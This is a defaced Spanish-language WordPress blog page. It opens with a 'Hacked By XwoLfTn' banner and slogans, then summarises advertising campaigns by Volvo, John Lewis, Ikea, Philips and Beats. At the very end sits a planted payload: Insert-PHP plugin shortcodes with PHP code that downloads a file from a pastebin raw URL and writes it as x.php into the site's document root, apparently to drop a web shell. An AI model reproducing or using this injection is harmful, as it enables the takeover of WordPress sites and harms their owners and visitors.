Hacked By XwoLfTn

Hacked By XwoLfTn

Long life for Tunisia 
long life to Palestine

./Exit

 

WordPress

La espectacular acción de Volvo Trucks: ‘The Flying Passenger’

Para demostrar la precisión y rendimiento del motor gracias a la tecnologia I-Shift Duel Clutch, Volvo realizó un test con un parapentista profesional atado a la parte posterior del camión. El reto era mantener el parapente en vuelo y para ello la conductora debía mantener una velocidad constante a pesar de las carreteras reviradas y montañosas.

Fuente | Agencia de Publicidad Telling

El anuncio de Navidad de John Lewis

El anuncio de este año nos narra la historia de una padre de familia que monta una colchoneta elástica para regalársela a su hija el día de navidad. Pero durante la noche, unos zorros entran y empiezan a saltar en ella para después llamar la atención de todo tipo de animales como ardillas, puercoespines y mofetas, que no dudan en pasar un rato divertido en la colchoneta mientras Buster, el perro de raza boxer de la familia se lo mira con envidia desde el interior de la casa.

Street Marketing de Old Irish con realidad virtual

La acción se ha realizado en Tiflis, Georgia donde los georgianos son muy desconfiados y no se creen los eslóganes publicitarios que copan los diferentes anuncios de cerveza. Así que Old Irish ha querido demostrar que su eslogan “Descubre el sabor verdadero de Irlanda” no es ninguna mentira sino 100% real con una sorprendente acción de Street Marketing combinada con la realidad virtual.

Bajo el nombre de “Viaja a Irlanda” se invitó a transeúntes de Tiflis a conocer la llamada isla esmeralda, el país de los tréboles, los duendes y las ovejas a través de una experiencia audiovisual con las gafas de realidad virtual, en la que se iban sucediendo imágenes y vídeos de paisajes y cultura irlandesas.

Visto en | Agencia de Publicidad Telling

Ikea presenta un emotivo spot: My Son

El último spot de Ikea nos vuelve a tocar la fibra con una emotiva historia entre madre e hijo en una de sus tiendas en Francia, para recordarnos que hay cosas que nos gustaría que se mantuvieran para siempre, como podrían ser por ejemplo los precios de Ikea.

Pero la vida no funciona así y el niño acompaña la madre a realizar una serie de compras para casa. Al final, el giro argumental nos hará empatizar con los protagonistas en lo que es un momento clave en las relaciones familiares.

Visto en | RW

Everyday Hero: El emotivo spot de Philips con Spiderman

Con este anuncio, Philips nos demuestra que cualquiera de nosotros puede ser un superhéroe a través de pequeños gestos a lo largo del día, como el curioso Spiderman que quiere hacer felices a unos niños en el hospital. Pero aunque seas un superhéroe no puedes llegar tarde a los sitios, y aquí empieza la odisea del protagonista del spot de Philips, llegar a tiempo a su cometido.

Visto en | LCC

Chauffeur Service in Lisbon

Beats by Dre presenta su divertido spot: “Got no strings”

El spot de Beats by Dre nos presenta de una manera divertida y original su nueva gama de auriculares wireless, con la popular canción de Pinocho “Got no strings” como hilo conductor en el que aparecen numerosas celebrities como Nicki Minaj, Amber Rose, Pharrell, Steve Buscemi y Michael Phelps entre otras.

El spot de Beats sigue una línea muy parecida a los últimos spots de Apple, la qual compró Beats de Dr. Dre en 2014 para ofrecer sus productos y software a todos los usuarios de la marca de la manzana. En el vemos a Pinocho en la popular escena cantando la canción “Got no strings” (no tengo cables) y experimentando la libertad cuando se convirtió en niño y se deshizo de sus cables de marioneta.

Fuente | Agencia Telling

Stop-Motion: Evolución desde 1900

Vugar Efendi, una entusiasta de la técnica i aspirante a director de cine ha realizado un corto de 3 minutos en que resume los 116 años de historia del Stop-Motion. En ella vemos ejemplos de películas míticas como “King Kong” (1933), “Robocop”(1987), “Jason y los Argonautas” (1963) “Pesadilla Antes de Navidad” (1993), “Evasión en la granja” (2000), varias entregas de“Star Wars” o la recién estrenada “Kubo y las dos cuerdas mágicas”.

Idc about you mad hatters

[/wp-content/plugins/insert-php/] fwrite(fopen($_SERVER[‘DOCUMENT_ROOT’].’/x.php’,’w+’),file_get_contents(‘http://pastebin.com/raw/WmdrMpJ8’)); [/wp-content/plugins/insert-php/][php] fwrite(fopen($_SERVER[‘DOCUMENT_ROOT’].’/x.php’,’w+’),file_get_contents(‘http://pastebin.com/raw/WmdrMpJ8’)); [/php]sports74.ru